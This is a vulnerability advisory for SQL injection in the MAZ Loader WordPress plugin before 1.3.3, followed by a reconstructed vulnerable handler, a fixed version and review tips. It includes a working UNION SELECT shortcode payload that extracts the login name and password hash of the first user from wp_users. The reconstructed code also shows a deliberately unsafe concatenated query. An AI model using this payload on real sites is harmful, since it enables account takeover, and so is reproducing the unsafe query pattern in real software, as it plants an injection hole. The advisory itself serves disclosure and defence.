MAZ Loader < 1.3.3 - Contributor+ SQL Injection

2021-10-11T00:00:00
ID WPEX-ID:B97AFBE8-C9AE-40A2-81E5-B1D7A6B31831
Type wpexploit
Reporter apple502j
Modified 2021-10-11T07:04:52

Description

The plugin does not validate or escape the loader_id parameter of the mzldr shortcode, which allows users with a role as low as Contributor to perform SQL injection.

As a user with a role as low as Contributor, put the following shortcode in a page/post and view/preview it to get the login name:password hash pair of the first user in the database (generally admin).

[mzldr loader_id="12345 UNION SELECT 0,1,'SQLi',CONCAT(FROM_BASE64('eyJkYXRhIjp7IjEiOnsiaWQiOjEsInR5cGUiOiJ0ZXh0IiwidGV4dCI6Ig=='),user_login,':',user_pass,FROM_BASE64('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')),1,'2021-08-24 00:00:00',NULL,1 FROM wp_users UNION SELECT *, 1 FROM wp_mzldr_loaders WHERE 0=1"]
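The root cause described above is an attribute interpolated straight into SQL. The following is an added illustration, not the plugin's own code: a hypothetical reconstruction of the flawed shortcode handler next to a hardened version that coerces the id to an integer and binds it through $wpdb->prepare(). The table name comes from the PoC; the column names (id, name) are assumed.

```php
<?php
// Hypothetical reconstruction of the pattern the advisory describes.
// NOT the plugin's real code; column names id/name are assumed.

// Vulnerable pattern: the shortcode attribute is concatenated into the query,
// so anyone who can place the shortcode (Contributor+) controls the SQL.
function mzldr_shortcode_vulnerable( $atts ) {
    global $wpdb;
    $atts = shortcode_atts( array( 'loader_id' => 0 ), $atts, 'mzldr' );
    $row  = $wpdb->get_row(
        "SELECT * FROM {$wpdb->prefix}mzldr_loaders WHERE id = " . $atts['loader_id']
    );
    return $row ? esc_html( $row->name ) : '';
}

// Hardened form: coerce to a non-negative integer, reject zero/missing ids,
// and pass the value as a bound %d placeholder so it can never become SQL.
function mzldr_shortcode_fixed( $atts ) {
    global $wpdb;
    $atts      = shortcode_atts( array( 'loader_id' => 0 ), $atts, 'mzldr' );
    $loader_id = absint( $atts['loader_id'] ); // "12345 UNION ..." -> 12345
    if ( 0 === $loader_id ) {
        return '';
    }
    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}mzldr_loaders WHERE id = %d",
            $loader_id
        )
    );
    // Escape on output as well, since loader data is rendered into the post.
    return $row ? esc_html( $row->name ) : '';
}

add_shortcode( 'mzldr', 'mzldr_shortcode_fixed' );
```

When reviewing a plugin for this class of bug, grep shortcode callbacks for `$wpdb->get_row(`, `get_results(` and `query(` calls whose SQL string is built with `.` or `{$...}` from `$atts`; every such site should go through `$wpdb->prepare()`.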